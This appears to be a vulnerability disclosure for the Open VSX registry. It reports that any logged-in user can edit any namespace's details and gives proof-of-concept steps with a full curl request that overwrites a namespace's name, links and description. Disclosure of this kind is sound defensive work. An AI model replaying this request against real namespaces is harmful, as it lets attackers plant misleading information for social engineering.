Description

The /user/namespace/{namespace}/details API allows users to edit every namespace details, even though they are not owner of the namespace or even if they are not part of the namespace at all.
The details include:

• name
• displayName
• description
• website
• supportLink
• socialLinks:
  • linkedin
  • twitter
  • github

PoC

1. Visit https://open-vsx.org/
2. Login via a GitHub user who does not have any privilege over any namespace
3. Take note of the session cookie
4. Visit the following URL: https://open-vsx.org/user/csrf
5. Replay the following request through curl after having replaced the $COOKIE placeholder with the value obtained at step 3, the $CSRF_TOKEN placeholder with the values obtained at step 4, and the $NAMESPACE placeholder with the name of the namespace to edit:

curl -H "X-Csrf-Token: $CSRF_TOKEN" -H "Content-Type: application/json" -b "$COOKIE"
    --data-binary $'{\"name\":\"c\",\"displayName\":\"PoC\",\"description\":\"PoC by smaury, maitai, and zi0black\",\"website\":\"https://www.shielder.com\",\"supportLink\":\"\",\"socialLinks\":{\"linkedin\":\"https://www.linkedin.com/company/shielder\",\"twitter\":\"https://twitter.com/ShielderSec\",\"github\":\"https://github.com/ShielderSec\"}}' "https://open-vsx.org/user/namespace/$NAMESPACE/details"

A live exploitation attempt could be observed at https://open-vsx.org/namespace/c which is not owned by the ShielderTest user, which the user who edited the namespace.

Impact

An attacker can update any namespace information, inserting misleading information as part of the namespace name, description, website, support URL, and social links.
This can be abused as part of social engineering attacks.

Reporters

• Abdel Adim smaury Oisfi of Shielder
• Andrea Cappa zi0Black of Aptos Labs
• Leonardo Giovannini maitai